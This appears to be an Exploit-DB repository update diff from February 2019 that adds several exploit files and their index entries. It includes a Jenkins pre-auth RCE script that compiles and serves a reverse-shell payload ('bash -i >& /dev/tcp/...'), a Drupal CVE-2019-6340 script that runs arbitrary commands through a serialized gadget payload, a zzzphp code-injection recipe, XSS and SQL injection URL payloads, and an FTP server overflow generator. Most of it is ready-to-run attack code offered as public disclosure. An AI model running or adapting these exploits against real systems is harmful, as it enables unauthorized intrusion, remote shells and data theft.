DB: 2019-02-26

7 changes to exploits/shellcodes

Xlight FTP Server 3.9.1 - Buffer Overflow (PoC)

Jenkins - Remote Code Execution
Jenkins Plugin Script Security < 1.50/Declarative < 1.3.4.1/Groovy < 2.61.1 - Remote Code Execution (PoC)
Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution
zzzphp CMS 1.6.1 - Remote Code Execution
PHP Ecommerce Script 2.0.6 - Cross-Site Scripting / SQL Injection
News Website Script 2.0.5 - SQL Injection
Advance Gift Shop Pro Script 2.0.3 - SQL Injection
Drupal < 8.6.9 - REST Module Remote Code Execution

exploits/java/webapps/46453.py

@@ -0,0 +1,153 @@
+#!/usr/bin/env python
+#
+# Exploit Title     : jenkins-preauth-rce-exploit.py
+# Date              : 02/23/2019
+# Authors           : wetw0rk & 0xtavian
+# Vendor Homepage   : https://jenkins.oi
+# Software Link     : https://jenkins.io/download/
+# Tested on         : jenkins=v2.73 Plugins: Script Security=v1.49, Pipeline: Declarative=v1.3.4, Pipeline: Groovy=v2.60,
+#
+# Greetz: Hima, Fr13ndzSec, AbeSnowman, Berserk, Neil
+#
+# Description : This exploit chains CVE-2019-1003000 and CVE-2018-1999002 for Pre-Auth Remote Code Execution in Jenkins
+# Security Advisory : https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266
+#
+# Vulnerable Plugins -
+# Pipeline: Declarative Plugin up to and including 1.3.4
+# Pipeline: Groovy Plugin up to and including 2.61
+# Script Security Plugin up to and including 1.49
+#
+#
+# Credit Goes To @orange_8361 & adamyordan
+#
+# http://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
+# http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
+# https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
+
+import os
+import sys
+import requests
+import random
+import SimpleHTTPServer
+import SocketServer
+import multiprocessing
+
+class exploit_ya_bish():
+
+  def __init__(self, rhost, rport, lhost, lport):
+    self.rhost = rhost
+    self.rport = rport
+    self.lhost = lhost
+    self.lport = lport
+    self.pname = ""
+
+  # evil_server: server to host the payload
+  def evil_server(self):
+    handler = SimpleHTTPServer.SimpleHTTPRequestHandler
+    httpd = SocketServer.TCPServer((self.lhost, 80), handler)
+    httpd.serve_forever()
+    return
+
+  # gen_payload: generate payload and start web server
+  def gen_payload(self):
+    self.pname = ''.join(
+      [
+        random.choice(
+          "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+          "abcdefghijklmnopqrstuvwxyz"
+        ) for i in range(random.randint(1, 25))
+      ]
+    )
+
+    home = os.getcwd()
+    os.makedirs("www/package/%s/1/" % self.pname)
+    os.chdir("www/package/%s/1/" % self.pname)
+
+    pfile  = 'public class %s {\n' % self.pname
+    pfile += '  public %s() {\n' % self.pname
+    pfile += '    try {\n'
+    pfile += '      String payload = "bash -i >& /dev/tcp/{:s}/{:s} 0>&1";\n'.format(self.lhost, self.lport)
+    pfile += '      String[] cmds = { "/bin/bash", "-c", payload };\n'
+    pfile += '      java.lang.Runtime.getRuntime().exec(cmds);\n'
+    pfile += '    } catch (Exception e) {\n'
+    pfile += '    }\n'
+    pfile += '  }\n'
+    pfile += '}\n'
+
+    print "{1} generating payload"
+    fd = open('{:s}.java'.format(self.pname), 'w')
+    fd.write(pfile)
+    fd.close()
+
+    os.makedirs("META-INF/services/")
+    os.system("echo %s >  META-INF/services/org.codehaus.groovy.plugins.Runners" % self.pname)
+    os.system("javac -Xlint:-options -source 6 -target 1.6 %s.java" % self.pname)
+    os.system("jar cf %s-1.jar ." % self.pname)
+
+    print "{2} starting evil payload server"
+    os.chdir("%s/www" % home)
+    jobs = []
+    for i in range(1):
+      p = multiprocessing.Process(target=self.evil_server)
+      jobs.append(p)
+      p.start()
+
+    os.chdir(home)
+
+    return
+
+  def exploit(self):
+    self.gen_payload()
+
+    cookies = \
+    {
+      'JSESSIONID.wetw0rk!': 'XXXXXXXXXXXXXXXXXXXXXXXX',
+    }
+
+    headers = \
+    {
+      'Host': '{:s}:{:s}'.format(self.rhost, self.rport),
+      'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+      'Accept-Language': 'en-US,en;q=0.5',
+      'Accept-Encoding': 'gzip, deflate',
+      'Connection': 'close',
+      'Upgrade-Insecure-Requests': '1',
+    }
+
+    print "{3} as easy as 1,2,3 triggering now"
+    response = requests.get(
+      (
+       'http://{:s}:{:s}/securityRealm/user/admin/descriptorByName/'
+       'org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value='
+          '@GrabConfig(disableChecksums=true)%0a'
+          '@GrabResolver(name=%27{:s}%27,%20root=%27http://{:s}%27)%0a'
+          '@Grab(group=%27package%27,%20module=%27{:s}%27,%20version=%271%27)%0aimport%20Payload;'.format(
+            self.rhost, self.rport,
+            self.pname,
+            self.lhost,
+            self.pname
+        )
+      ),
+      headers=headers,
+      cookies=cookies,
+      verify=False
+    )
+
+    return
+
+def main():
+  try:
+    rhost = sys.argv[1]
+    rport = sys.argv[2]
+    lhost = sys.argv[3]
+    lport = sys.argv[4]
+  except:
+    print "Usage: ./%s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
+    print "MAKE SURE U GOT A LISTENER HOMIE!!"
+    exit(-1)
+
+  start = exploit_ya_bish(rhost,rport,lhost,lport)
+  start.exploit()
+  os.system("rm -r www")
+
+main()

exploits/php/webapps/46454.txt

@@ -0,0 +1,30 @@
+# Exploit Title: dynamic code evaluation of zzzphp cms 1.6.1
+
+# Google Dork: intext:"2015-2019 zzcms.com"
+
+# Date: 24/02/2019
+
+# Exploit Author: Yang Chenglong
+
+# Vendor Homepage: http://www.zzzcms.com/index.html
+
+# Software Link: http://115.29.55.18/zzzphp.zip
+
+# Version: 1.6.1
+
+# Tested on: windows/Linux,iis/apache
+
+# CVE : CVE-2019-9041
+
+Due to the failure of filtering function parserIfLabel() in inc/zzz_template.php, attackers can insert dynamic php code into the template file and leads to dynamic code evaluation.
+
+Exploit:
+login in to the admin panel, edit the template of search.html, insert the following code:
+
+{if:assert($_POST[x])}phpinfo();{end if}
+
+Visit the http://webroot/search/ and post data “x = phpinfo();”, the page will execute the php code “phpinfo()” as follow:
+[1.png]
+
+Remarks:
+While the above exploit requires attackers to have the access to the admin panel, I will post another exploit by using csrf to acquire the control of website without access to the admin panel.

exploits/php/webapps/46455.txt

@@ -0,0 +1,21 @@
+# Exploit Title: PHP Ecommerce Script 2.0.6 - Cross Site Scripting / SQL Injection
+# Exploit Author: Mr Winst0n
+# Author E-mail: manamtabeshekan[@]gmail[.]com
+# Discovery Date: February 22, 2019
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link : https://www.phpscriptsmall.com/product/php-ecommerce-script/
+# Tested Version: 2.0.6
+# Tested on: Kali linux, Windows 8.1 
+
+
+# PoC:
+
+# Cross Site Scripting:
+
+# http://localhost/[PATH]/?s=[XSS]
+# http://localhost/[PATH]/?s=<scRiPt>alert(1)</ScrIpT>
+
+# SQL Injection:
+
+# http://localhost/[PATH]/?s=[SQL]
+# http://localhost/[PATH]/?s=1%20and%20extractvalue(rand(),concat(0x7e,version()))

exploits/php/webapps/46456.txt

@@ -0,0 +1,15 @@
+# Exploit Title: News Website Script 2.0.5 - SQL Injection
+# Exploit Author: Mr Winst0n
+# Author E-mail: manamtabeshekan[@]gmail[.]com
+# Discovery Date: February 22, 2019
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link : https://www.phpscriptsmall.com/product/news-website-script/
+# Tested Version: 2.0.5
+# Tested on: Kali linux, Windows 8.1 
+
+
+# PoC:
+
+# http://localhost/[PATH]/index.php/show/news/11 [SQL]/
+
+# http://localhost/[PATH]/index.php/show/news/11%20and%201=0/Sports/january-25-2018/Pogba-still-has-to-improve-Allegri

exploits/php/webapps/46457.txt

@@ -0,0 +1,14 @@
+# Exploit Title: Advance Gift Shop Pro Script 2.0.3 - SQL Injection
+# Exploit Author: Mr Winst0n
+# Author E-mail: manamtabeshekan[@]gmail[.]com
+# Discovery Date: February 21, 2019
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link : https://www.phpscriptsmall.com/product/gifts-shop/
+# Tested Version: 2.0.3
+# Tested on: Kali linux, Windows 8.1 
+
+
+# PoC:
+
+# http://localhost/[PATH]/?category=&s=[SQL]&search_posttype=product
+# http://localhost/[PATH]/?category=&s=1%20and%20extractvalue(rand(),concat(0x7e,version()))&search_posttype=product

exploits/php/webapps/46459.py

@@ -0,0 +1,224 @@
+#!/usr/bin/env python3
+
+# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC
+# 2019 @leonjza
+
+# Technical details for this exploit is available at:
+#   https://www.drupal.org/sa-core-2019-003
+#   https://www.ambionics.io/blog/drupal8-rce
+#   https://twitter.com/jcran/status/1099206271901798400
+
+# Sample usage:
+#
+# $ python cve-2019-6340.py http://127.0.0.1/ "ps auxf"
+# CVE-2019-6340 Drupal 8 REST Services Unauthenticated RCE PoC
+#  by @leonjza
+#
+# References:
+#  https://www.drupal.org/sa-core-2019-003
+#  https://www.ambionics.io/blog/drupal8-rce
+#
+# [warning] Caching heavily affects reliability of this exploit.
+# Nodes are used as they are discovered, but once they are done,
+# you will have to wait for cache expiry.
+#
+# Targeting http://127.0.0.1/...
+# [+] Finding a usable node id...
+# [x] Node enum found a cached article at: 2, skipping
+# [x] Node enum found a cached article at: 3, skipping
+# [+] Using node_id 4
+# [+] Target appears to be vulnerable!
+#
+# USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
+# root        49  0.0  0.0   4288   716 pts/0    Ss+  16:38   0:00 sh
+# root         1  0.0  1.4 390040 30540 ?        Ss   15:20   0:00 apache2 -DFOREGROUND
+# www-data    24  0.1  2.8 395652 57912 ?        S    15:20   0:08 apache2 -DFOREGROUND
+# www-data    27  0.1  2.9 396152 61108 ?        S    15:20   0:08 apache2 -DFOREGROUND
+# www-data    31  0.0  3.4 406304 70408 ?        S    15:22   0:04 apache2 -DFOREGROUND
+# www-data    39  0.0  2.7 398472 56852 ?        S    16:14   0:02 apache2 -DFOREGROUND
+# www-data    44  0.2  3.2 402208 66080 ?        S    16:37   0:05 apache2 -DFOREGROUND
+# www-data    56  0.0  2.6 397988 55060 ?        S    16:38   0:01 apache2 -DFOREGROUND
+# www-data    65  0.0  2.3 394252 48460 ?        S    16:40   0:01 apache2 -DFOREGROUND
+# www-data    78  0.0  2.5 400996 51320 ?        S    16:47   0:01 apache2 -DFOREGROUND
+# www-data   117  0.0  0.0   4288   712 ?        S    17:20   0:00  \_ sh -c echo
+
+import sys
+from urllib.parse import urlparse, urljoin
+
+import requests
+
+
+def build_url(*args) -> str:
+    """
+        Builds a URL
+    """
+
+    f = ''
+    for x in args:
+        f = urljoin(f, x)
+
+    return f
+
+
+def uri_valid(x: str) -> bool:
+    """
+        https://stackoverflow.com/a/38020041
+    """
+
+    result = urlparse(x)
+    return all([result.scheme, result.netloc, result.path])
+
+
+def check_drupal_cache(r: requests.Response) -> bool:
+    """
+        Check if a response had the cache header.
+    """
+
+    if 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT':
+        return True
+
+    return False
+
+
+def find_article(base: str, f: int = 1, l: int = 100):
+    """
+        Find a target article that does not 404 and is not cached
+    """
+
+    while f < l:
+        u = build_url(base, '/node/', str(f))
+        r = requests.get(u)
+
+        if check_drupal_cache(r):
+            print(f'[x] Node enum found a cached article at: {f}, skipping')
+            f += 1
+            continue
+
+        # found an article?
+        if r.status_code == 200:
+            return f
+        f += 1
+
+
+def check(base: str, node_id: int) -> bool:
+    """
+        Check if the target is vulnerable.
+    """
+
+    payload = {
+        "_links": {
+            "type": {
+                "href": f"{urljoin(base, '/rest/type/node/INVALID_VALUE')}"
+            }
+        },
+        "type": {
+            "target_id": "article"
+        },
+        "title": {
+            "value": "My Article"
+        },
+        "body": {
+            "value": ""
+        }
+    }
+
+    u = build_url(base, '/node/', str(node_id))
+    r = requests.get(f'{u}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"})
+
+    if check_drupal_cache(r):
+        print(f'Checking if node {node_id} is vuln returned cache HIT, ignoring')
+        return False
+
+    if 'INVALID_VALUE does not correspond to an entity on this site' in r.text:
+        return True
+
+    return False
+
+
+def exploit(base: str, node_id: int, cmd: str):
+    """
+        Exploit using the Guzzle Gadgets
+    """
+
+    # pad a easy search replace output:
+    cmd = 'echo ---- & ' + cmd
+    payload = {
+        "link": [
+            {
+                "value": "link",
+                "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000"
+                           "GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\""
+                           "close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:"
+                           "{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";"
+                           "s:|size|:\"|command|\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000"
+                           "stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000"
+                           "GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\""
+                           "resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
+                           "".replace('|size|', str(len(cmd))).replace('|command|', cmd)
+            }
+        ],
+        "_links": {
+            "type": {
+                "href": f"{urljoin(base, '/rest/type/shortcut/default')}"
+            }
+        }
+    }
+
+    u = build_url(base, '/node/', str(node_id))
+    r = requests.get(f'{u}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"})
+
+    if check_drupal_cache(r):
+        print(f'Exploiting {node_id} returned cache HIT, may have failed')
+
+    if '----' not in r.text:
+        print('[warn] Command execution _may_ have failed')
+
+    print(r.text.split('----')[1])
+
+
+def main(base: str, cmd: str):
+    """
+        Execute an OS command!
+    """
+
+    print('[+] Finding a usable node id...')
+    article = find_article(base)
+    if not article:
+        print('[!] Unable to find a node ID to reference. Check manually?')
+        return
+
+    print(f'[+] Using node_id {article}')
+
+    vuln = check(base, article)
+    if not vuln:
+        print('[!] Target does not appear to be vulnerable.')
+        print('[!] It may also simply be a caching issue, so maybe just try again later.')
+        return
+    print(f'[+] Target appears to be vulnerable!')
+
+    exploit(base, article, cmd)
+
+
+if __name__ == '__main__':
+
+    print('CVE-2019-6340 Drupal 8 REST Services Unauthenticated RCE PoC')
+    print(' by @leonjza\n')
+    print('References:\n'
+          ' https://www.drupal.org/sa-core-2019-003\n'
+          ' https://www.ambionics.io/blog/drupal8-rce\n')
+    print('[warning] Caching heavily affects reliability of this exploit.\n'
+          'Nodes are used as they are discovered, but once they are done,\n'
+          'you will have to wait for cache expiry.\n')
+
+    if len(sys.argv) <= 2:
+        print(f'Usage: {sys.argv[0]} <target base URL> <command>')
+        print(f'    Example: {sys.argv[0]} http://127.0.0.1/ id')
+
+    target = sys.argv[1]
+    command = sys.argv[2]
+    if not uri_valid(target):
+        print(f'Target {target} is not a valid URL')
+        sys.exit(1)
+
+    print(f'Targeting {target}...')
+    main(target, command)

exploits/windows/dos/46458.py

@@ -0,0 +1,33 @@
+# Exploit Title: Xlight 3.9.1 FTP Server SEH Overwrite
+# Google Dork: N/A
+# Date: 2019-02-24
+# Exploit Author: Logan Whitmire
+# Vendor Homepage: https://www.xlightftpd.com/index.htm
+# Software Link: https://www.xlightftpd.com/download/xlight.zip
+# Version: 3.9.1
+# Tested on: Windows XP
+# CVE : N/A
+
+
+POC:#!/usr/bin/python
+#Vulnerable Software: Xlight FTP Server 3.9.1
+#Link: https://www.xlightftpd.com/download.htm
+#Date: 2019-02-24
+#Twitter: thermal_tp
+#inspired by bzyo's exploit
+# 1. Generate overflow.txt, open, and copy contents to clipboard
+# 2. Virtual Server
+# 3. Modify Virtual Server Configuration
+# 4. Advanced
+# 5. Misc
+# 6. Execute a program after user logged in
+# 7. Setup
+# 8. Paste crash.txt contents
+# 9. Application crashes
+# 10. SEH is overwritten
+
+buffer="A"*428
+file="overflow.txt"
+generate=open(file, "w")
+generate.write(buffer)
+generate.close

files_exploits.csv

@@ -6335,6 +6335,7 @@ id,file,description,date,author,type,platform,port
 46443,exploits/android/dos/46443.py,"ScreenStream 3.0.15 - Denial of Service",2019-02-21,s4vitar,dos,android,
 46445,exploits/android/dos/46445.c,"AirDrop 2.0 - Denial of Service (DoS)",2019-02-21,s4vitar,dos,android,
 46448,exploits/multiple/dos/46448.js,"WebKit JSC - reifyStaticProperty Needs to set the PropertyAttribute::CustomAccessor flag for CustomGetterSetter",2019-02-22,"Google Security Research",dos,multiple,
+46458,exploits/windows/dos/46458.py,"Xlight FTP Server 3.9.1 - Buffer Overflow (PoC)",2019-02-25,"Logan Whitmire",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -40900,9 +40901,15 @@ id,file,description,date,author,type,platform,port
 46424,exploits/php/webapps/46424.html,"XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting",2019-02-19,"Rafael Pedrero",webapps,php,80
 46425,exploits/jsp/webapps/46425.html,"Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting",2019-02-19,"Rafael Pedrero",webapps,jsp,
 46426,exploits/php/webapps/46426.txt,"Ask Expert Script 3.0.5 - Cross Site Scripting / SQL Injection",2019-02-19,"Mr Winst0n",webapps,php,80
-46427,exploits/java/webapps/46427.txt,"Jenkins - Remote Code Execution",2019-02-19,orange,webapps,java,
+46427,exploits/java/webapps/46427.txt,"Jenkins Plugin Script Security < 1.50/Declarative < 1.3.4.1/Groovy < 2.61.1 - Remote Code Execution (PoC)",2019-02-19,orange,webapps,java,
 46429,exploits/php/webapps/46429.txt,"HotelDruid 2.3 - Cross-Site Scripting",2019-02-20,"Mehmet EMIROGLU",webapps,php,80
 46446,exploits/multiple/webapps/46446.txt,"Quest NetVault Backup Server < 11.4.5 - Process Manager Service SQL Injection / Remote Code Execution",2019-02-22,"Chris Anastasio",webapps,multiple,
 46450,exploits/linux/webapps/46450.txt,"Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation",2019-02-22,SecureAuth,webapps,linux,
 46451,exploits/hardware/webapps/46451.txt,"Teracue ENC-400 - Command Injection / Missing Authentication",2019-02-22,"Stephen Shkardoon",webapps,hardware,
 46452,exploits/php/webapps/46452.txt,"Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution",2019-02-23,"Charles Fol",webapps,php,80
+46453,exploits/java/webapps/46453.py,"Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution",2019-02-25,wetw0rk,webapps,java,
+46454,exploits/php/webapps/46454.txt,"zzzphp CMS 1.6.1 - Remote Code Execution",2019-02-25,"Yang Chenglong",webapps,php,
+46455,exploits/php/webapps/46455.txt,"PHP Ecommerce Script 2.0.6 - Cross-Site Scripting / SQL Injection",2019-02-25,"Mr Winst0n",webapps,php,
+46456,exploits/php/webapps/46456.txt,"News Website Script 2.0.5 - SQL Injection",2019-02-25,"Mr Winst0n",webapps,php,
+46457,exploits/php/webapps/46457.txt,"Advance Gift Shop Pro Script 2.0.3 - SQL Injection",2019-02-25,"Mr Winst0n",webapps,php,
+46459,exploits/php/webapps/46459.py,"Drupal < 8.6.9 - REST Module Remote Code Execution",2019-02-25,leonjza,webapps,php,